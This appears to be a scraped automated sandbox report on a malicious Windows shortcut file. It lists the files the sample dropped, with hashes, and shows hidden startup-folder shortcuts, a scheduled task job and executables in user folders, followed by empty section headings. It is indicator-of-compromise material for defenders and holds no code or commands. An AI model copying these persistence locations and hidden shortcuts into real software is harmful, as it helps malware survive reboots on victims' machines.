C:\Users\user\AppData\Local\Temp\161ebd1	data	DC17A490C8D1ABD780EDB011952FFC38	938C15001B096BFB72633861FDAAAF6DF53C084D	9CB638622822CB1B95369704623C12D215170E14CC13168672CE9E97098C66CF
C:\Users\user\AppData\Local\Temp\32f7631	data	728E69D6EAC04926643AA1E73F9D2282	8FD0099F95B08059AA417B8CDBD403C586A83214	1B90DF8D05E3AF6291F043664E9C071DD4726F9DFD4E91E06A683A3A5337BFF2
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l31uaxlx.vs2.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oduknhyj.r2i.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\eb07f5bb	data	2DE0E9B8C7CC678C2C310FDC6BE1E6BA	6994E10583C32897ABF910AC3F29E4EA7B3ACC75	3B1DA5F941FBEF8A65D0DD0D0B2ED89B76D9DA2380ED1A324290CB889FA1A902
C:\Users\user\AppData\Local\Temp\f5c98f9e	data	B51F5C77F1DCB37CD0B9CD0D92B9497A	53EDE7AE793F9D460FABE2706B8CF7F8863EC305	B88B072E4626E1C45BAE22710BE2578D9807B9D96B3304998A577C2F9B5C00FE
C:\Users\user\AppData\Local\Temp\gnqpmvvlbu	PE32 executable (GUI) Intel 80386, for MS Windows	6CA401F82443B673FCA7D7DDB0A05357	82E54CBDCF4E12A72A32E52E0FD03C095485B841	7AA4BC94F891709D5B0FF9C2F95060AEEFB5AC6EB75222F9F105E29C3965629F
C:\Users\user\AppData\Local\Temp\lejp	PE32 executable (GUI) Intel 80386, for MS Windows	6CA401F82443B673FCA7D7DDB0A05357	82E54CBDCF4E12A72A32E52E0FD03C095485B841	7AA4BC94F891709D5B0FF9C2F95060AEEFB5AC6EB75222F9F105E29C3965629F
C:\Users\user\AppData\Local\Temp\paogviura	PE32 executable (GUI) Intel 80386, for MS Windows	6CA401F82443B673FCA7D7DDB0A05357	82E54CBDCF4E12A72A32E52E0FD03C095485B841	7AA4BC94F891709D5B0FF9C2F95060AEEFB5AC6EB75222F9F105E29C3965629F
C:\Users\user\AppData\Local\Temp\rjhlrgwt	PE32 executable (GUI) Intel 80386, for MS Windows	6CA401F82443B673FCA7D7DDB0A05357	82E54CBDCF4E12A72A32E52E0FD03C095485B841	7AA4BC94F891709D5B0FF9C2F95060AEEFB5AC6EB75222F9F105E29C3965629F
C:\Users\user\AppData\Local\Temp\wanynpfhxudgrp	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 25 15:34:02 2024, mtime=Wed Sep 25 15:34:02 2024, atime=Wed Sep 25 10:50:28 2024, length=8767704, window=hide	F2F09DD8BC63832A6A2249186765CED6	4FD9FB6B14EEE26EEEA5E53A0467F4D64AB791BB	57D07B671930537C3A5E935EBD8606645C02C801C39CBA249B62E1EC14B084B0
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BITE1BA.tmp	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 25 15:34:02 2024, mtime=Wed Sep 25 15:34:02 2024, atime=Wed Sep 25 10:50:28 2024, length=8767704, window=hide	F2F09DD8BC63832A6A2249186765CED6	4FD9FB6B14EEE26EEEA5E53A0467F4D64AB791BB	57D07B671930537C3A5E935EBD8606645C02C801C39CBA249B62E1EC14B084B0
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oracledemo_dbg.lnk (copy)	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 25 15:34:02 2024, mtime=Wed Sep 25 15:34:02 2024, atime=Wed Sep 25 10:50:28 2024, length=8767704, window=hide	F2F09DD8BC63832A6A2249186765CED6	4FD9FB6B14EEE26EEEA5E53A0467F4D64AB791BB	57D07B671930537C3A5E935EBD8606645C02C801C39CBA249B62E1EC14B084B0
C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	AD28D4167571382569D2384FFD7BD2A9	EFC7534BCB1645D4056702E073519F571D8DB77B	F919A8E63EC0F2F05AC01A6CAB4088C13FBF14A38B071CFA9F710C9E069462EB
C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	PE32 executable (GUI) Intel 80386, for MS Windows	EC9CE1D67F98072281015C7726FBA245	E89B16265ACF4A251B527DDF22830F2650987263	9AB4145D5525AE741B80F4E66F505ABBA59ADCBE01868DFEF84FBE4450634CC1
C:\Users\user\AppData\Roaming\Ruy_driverv2\ekqqtq	data	4649F3A4E58C6040B07F6D486C149A71	64F8FC631C5FB4E5F6BC20C207047D8E2B500587	5D81CA77492946AA2CFE00349342DE8CCEB317D8649BEDBFD95992DCA885F184
C:\Users\user\AppData\Roaming\Ruy_driverv2\ipqtwm	data	F125E72B3968CA233EF3C7E2F4DB34E7	4FB34044EF18CEDBD3EDE4272C44416D3F11735C	CED30560C6C0FC15CBDBDBC0D480DCA6B41CE3183057E43B419DD6814A33DB92
C:\Users\user\AppData\Roaming\hello.exe	PE32 executable (GUI) Intel 80386, for MS Windows	25860926414BF43383246F7C773A8D6C	760390A4A14DF085F4C841067F52C79409CDC93E	A8E552944846A2F5E8FEFEA4A250046DA29D74D1F58F7A868258E6DED9597958
C:\Users\user\DZIPR.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	AD28D4167571382569D2384FFD7BD2A9	EFC7534BCB1645D4056702E073519F571D8DB77B	F919A8E63EC0F2F05AC01A6CAB4088C13FBF14A38B071CFA9F710C9E069462EB
C:\Users\user\DZIPR.exe	PE32 executable (GUI) Intel 80386, for MS Windows	EC9CE1D67F98072281015C7726FBA245	E89B16265ACF4A251B527DDF22830F2650987263	9AB4145D5525AE741B80F4E66F505ABBA59ADCBE01868DFEF84FBE4450634CC1
C:\Users\user\ekqqtq	data	4649F3A4E58C6040B07F6D486C149A71	64F8FC631C5FB4E5F6BC20C207047D8E2B500587	5D81CA77492946AA2CFE00349342DE8CCEB317D8649BEDBFD95992DCA885F184
C:\Users\user\ipqtwm	data	F125E72B3968CA233EF3C7E2F4DB34E7	4FB34044EF18CEDBD3EDE4272C44416D3F11735C	CED30560C6C0FC15CBDBDBC0D480DCA6B41CE3183057E43B419DD6814A33DB92
C:\Windows\Tasks\lnfast_x64.job	data	E63E7D823FCDF42D66BFFC11A953063D	BEFB1B1B4D8840BFC61D0B0207DF3BA8132AC6F7	1F6CB39EFBA9971CBC3B0B22414A9FFC4A26A4B06459AD829670BA378369F672

Windows Analysis Report MdkbG2pK4l.lnk

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Exploits

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
MdkbG2pK4l.lnk

Malware Threat Intel
Provided by